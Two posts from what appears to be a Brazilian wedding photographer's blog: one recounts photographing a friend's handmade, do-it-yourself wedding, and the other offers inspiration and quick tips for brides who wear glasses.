Nós nos conhecemos desde a faculdade e antes mesmo dela ter a data do casamento marcada, eu já estava avisada que seria eu a fotógrafa (Uma honra!). O casamento deles foi bem “Faça você mesmo”, pois é, a noiva e noivo junto com os familiares fizeram praticamente tudo: bolo, bem casados, docinhos de mesa, lembrancinhas, arranjos, inclusive a própria maquiagem para o evento.  E em cada cantinho você podia ver um toque especial. Foram meses que eles dedicaram a preparar os detalhes.

Aproveito para desejar aos noivos uma vida cheia de felicidade! Minha gratidão pela confiança de vocês e por compartilharem comigo este dia.

Meu muito obrigada também para a Maressa Almeida por me ajudar na cobertura fotográfica desse dia especial.

Tudo ficou lindo e você pode conferir um resumo abaixo na galeria.

Até a próxima semana
Beijos

Inspiração: Noivas de óculos

Noivinha, se você, assim como eu, foi “contemplada” em ter que usar algum corretivo para a visão, esse post é para você.

Algumas mulheres, por vários motivos, têm que usar óculos durante o casamento: umas não se adaptam às lentes de contato; outras, porque realmente querem levar para o altar esse seu companheiro do dia a dia. E, para ver bem todos os detalhes do casório, selecionei alguma noivas bem modernas e estilosas para você se inspirar.

Dicas rapidinhas:

  • Confira se está tudo em dia com seus óculos;
  • Se possível, leve uma peça reserva – e deixe com alguém de confiança
  • Converse com quem vai produzir seu cabelo e maquiagem e cheguem a uma produção que harmonize com seus óculos e deixe tudo ainda mais lindo.